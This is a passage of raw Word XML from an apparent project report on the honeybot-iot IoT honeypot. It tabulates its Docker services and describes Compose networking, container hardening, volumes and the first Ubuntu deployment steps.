              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_redis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">redis:7.2-alpine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (backnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Device state and event bus (128 MB, LRU, no persistence)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_intel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">intel/, alerts/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/api)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (backnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat Intelligence Engine and notifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_api</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">api/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python:3.12-slim (honeybot/api)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (backnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">FastAPI REST API on port 5000 (internal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">nginx/, dashboard/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">nginx:1.26-alpine (honeybot/dashboard, built with node:22-alpine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">React dashboard, /api and /api/ws proxy, bcrypt basic auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_auth_init</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">deploy/auth-init.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">httpd:2.4-alpine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (exits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Writes the bcrypt password file, or generates and prints a password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">deploy/firewall.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">alpine:3.20 (honeybot/firewall)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (host network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Outbound isolation rules in DOCKER-USER, re-checked every 30 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">deploy/backup.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">postgres:16-alpine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">— (backnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled pg_dump and sample archive with SHA-256 manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="4829F7C6" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">honeybot_prometheus, _grafana, _cadvisor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">monitoring/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">prom/prometheus 2.53, grafana 11.1, cadvisor 0.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">127.0.0.1:9090 / :3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Optional monitoring profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9032" w:name="_Toc69032"/>
      <w:r>
        <w:t xml:space="preserve">Docker Compose Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9032"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The docker-compose.yml file defines the services with the following shared configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Networks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> honeynet (bridge 172.31.66.0/24) for the honeypots; backnet with internal: true for the database, Redis, state manager, API, engine and backup service; frontnet for Nginx, the only published dashboard port; egress for the engine's Telegram and SMTP traffic only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hardening (x-honeypot anchor):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-root user, read_only: true file system with a tmpfs /tmp, cap_drop: ALL, no-new-privileges, 0.75 CPU and 256 MB memory limit per honeypot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> env_file: .env supplies the database URL and password, Redis URL, detection thresholds, GeoIP mode and the Telegram/SMTP secrets; .env is git-ignored and .env.example is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Start order:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> honeypots depend on db (service_healthy, pg_isready), redis and the firewall service (service_healthy), so they never run without isolation; Nginx waits for auth-init and a healthy API; restart: unless-stopped restarts any crashed service automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Volumes:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pgdata (database), honey_data (SSH host key, TLS certificate), captures (quarantined samples), nginx_auth (bcrypt password file), ./backups (backup sets) and ./geoip mounted read-only for the GeoIP database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Simulation profile:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the attacker service (profile sim) runs tests/simulate_attacks.py inside the honeynet; the monitoring profile adds Prometheus, Grafana and cAdvisor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9033" w:name="_Toc69033"/>
      <w:r>
        <w:t xml:space="preserve">Deployment Steps</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9033"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deployment steps on an Ubuntu 24.04 LTS host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install Docker Engine and the Docker Compose plugin from the official Docker repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy the project and enter it: cd honeybot-iot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create the configuration: cp .env.example .env and set POSTGRES_PASSWORD, DATABASE_URL and DASHBOARD_PASSWORD (if it is left empty, a random password is generated and printed once).</w:t>
